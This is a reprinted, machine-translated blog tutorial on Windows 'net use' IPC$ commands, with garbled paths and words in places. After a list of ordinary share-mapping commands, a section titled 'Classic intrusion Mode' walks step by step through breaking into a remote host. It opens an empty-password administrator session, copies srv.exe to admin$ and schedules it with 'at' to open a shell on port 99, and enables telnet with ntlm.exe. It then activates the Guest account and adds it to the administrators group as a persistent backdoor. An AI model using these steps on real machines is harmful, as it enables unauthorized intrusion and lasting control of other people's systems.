Net use command details, use command details
Disclaimer: This article is for Reprinted content. Thanks to the hard work of the original author. Original link: http://www.cnblogs.com/chinahbzm/articles/1423875.html
1) Create an empty connection:
Net use \ IP \ ipc $ ""/user: "" (Note: This command contains three spaces)
2) establish a non-empty connection:
Net use \ IP \ ipc $ "password"/user: "username" (there are also three spaces)
3) default ing sharing:
Net use z: \ IP \ c $ "password"/user: "username" (you can map the disk c of the other party to your own z disk, and so on)
If you have already set up ipc $ with the target, you can directly use IP + drive letter + $ for access. The specific command is net use z: \ IP \ c $
4) delete an ipc $ connection
Net use \ IP \ ipc $/del
5) delete shared Mappings
Net use c:/del Delete the mapped c disk, and other disks.
Net use */del delete all. confirmation is required according to y as prompted.
3. view the shared resources of the remote host (but cannot see the default share)
Net view \ IP
4. view the shared resources of the local host (the local default share is displayed)
Net share
5. Obtain the username list of the remote host.
Nbtstat-A IP
6. Obtain the user list of the local host.
Net user
7. view the current time of the remote host
Net time \ IP
8. display the current service of the local host
Net start
9 start/Close local services
Net start service name/y
Net stop service name/y
10 ing Remote sharing:
Net use z: \ IP \ baby
This command maps the shared resource named baby to the z disk.
11 delete a shared ing
Net use c:/del Delete the mapped c disk, and other disks.
Net use */del/y delete all
12. Copy files to the remote host
Copy \ path \ srv.exe \ IP \ shared directory name, for example:
Copy ccbirds.exe \ *. * \ c: copy the files in the current directory to the drive c.
13 Add a scheduled task remotely
At \ ip time program name, for example:
At \ 127.0.0.0 :00 love.exe
Note: The time should be in the 24-hour format. You do not need to add a path in the system's default search path (such as system32/); otherwise, you must add a full path.
14 Enable telnet for the remote host
Here we need to use a small program: opentelnet.exe, which is available on all major download sites and must meet four requirements:
1) ipc $ sharing is enabled for the target.
2) You must have an administrator password and an account.
3) The RemoteRegistry service is enabled for the target user and the ntlm authentication is required.
4) valid for WIN2K/XP, NT not tested
Command Format: OpenTelnet.exe \ server account psw NTLM authentication port
Example: c: \> OpenTelnet.exe \ *. * administrator "" 1 90
15 activate a user/join the Administrator Group
1 net uesr account/active: yes
2 net localgroup administrators account/add
16 disable telnet on the remote host
You also need a small program: ResumeTelnet.exe
Command Format: ResumeTelnet.exe \ server account psw
Example: c: \> ResumeTelnet.exe \ *. * administrator ""
17. delete an established ipc $ connection.
Net use \ IP \ ipc $/del
9. Classic intrusion Mode
This intrusion mode is too classic. I have introduced most of the ipc tutorials and I will reference it here. Thanks to the original author! (I don't know which predecessor)
1. C: \> net use \ 127.0.0.1 \ IPC $ ""/user: "admintitrators"
This is an IP address with an empty password ("Empty Password? Wow, it's lucky to be home.) If you plan to attack, you can use this command to establish a connection with 127.0.0.1, because the password is "empty ", therefore, you do not need to enter the first quotation mark. The username in the next double quotation mark is entered. Enter the administrators command to complete the operation.
Before copying, you must use the net view \ IP command to view the sharing information of the other party.
2. C: \> copy srv.exe \ 127.0.0.1 \ admin $
Copy srv.exe first, which is available under the Tools directory of the streaming ($ here refers to the admin user's c: \ winnt \ system32 \, you can also use c $, d $, disk C and disk D, which depends on where you want to copy the disk ).
3. C: \> net time \ 127.0.0.1
Check the time and find that the current time of 127.0.0.1 is. The command is successfully completed.
4. C: \> at \ 127.0.0.1 11: 05 srv.exe
Use the atcommand to start srv.exe (the time set here is faster than the host time, or how do you start it !)
5. C: \> net time \ 127.0.0.1
Check the time? If the current time of 127.0.0.1 is, prepare to start the following command.
6. C: \> telnet 127.0.0.1 99
The Telnet command is used here. Note that the port is 99. Telnet uses port 23 by default, but we use SRV to create a Shell with port 99 for us on the other computer.
Although we can Telnet up, But SRV is a one-time, the next login will be activated again! So we plan to establish a Telnet service! This requires ntlm.
7. C: \> copy ntlm.exe \ 127.0.0.1 \ admin $
Use the copycommand to upload ntlm.exeto the Upload File (ntlm.exe is also in the Tools directory of "streaming light ).
8. C: \ WINNT \ system32> ntlm
Enter ntlm to start (Here C: \ WINNT \ system32> refers to the peer computer. Running ntlm actually allows this program to run on the peer computer ). When "DONE" appears, it indicates that it has been started normally. Then use "net start telnet" to enable the Telnet service!
9. Telnet 127.0.0.1, enter the user name and password to enter the other party, and the operation is as simple as the operation on DOS! (Then what do you want to do? Do whatever you want, haha)
To prevent this, we need to activate guest and add it to the Management Group.
10. C: \> net user guest/active: yes
Activate the other Guest user
11. C: \> net user guest 1234
Change the password of Guest to 1234, or set the password.
12. C: \> net localgroup administrators guest/add
Change Guest to Administrator ^_^ (if the Administrator password is changed and the guest account is not changed, we can use guest to Access this computer again next time)
In addition, you can analyze the cause based on the returned error number:
Error 5: Access Denied: the user you are using is probably not the administrator privilege. First, raise the privilege;
Error No. 51. The network path cannot be found in Windows: The network is faulty;
Error No. 53, network path not found: IP address error; target not on; Target lanmanserver service not started; Target firewall (Port filter );
Error No. 67. network name not found: Your lanmanworkstation service is not started or the target has deleted ipc $;
Error 1219: The creden provided conflict with the existing creden set: You have already created an ipc $ with the other party. Please delete and reconnect;
Error Code 1326, unknown user name or wrong password: The cause is obvious;
Error Code 1792: attempted to log on, but the network login service was not started: the target NetLogon service was not started;
Error Code 2242, the password of this user has expired: The target has an account policy, and the password must be changed periodically
When you use this method to shield the network ing function, you only need to open the system's run dialog box, and execute the "cmd" string command in it, switch the system interface to the MS-DOS command line status; then, execute the "net use x:/del" string command at the DOS prompt to disconnect the network ing connection with the network disk partition "X, to quickly disconnect all network ing connections on the local computer, you only need to run the "net use */del" string command.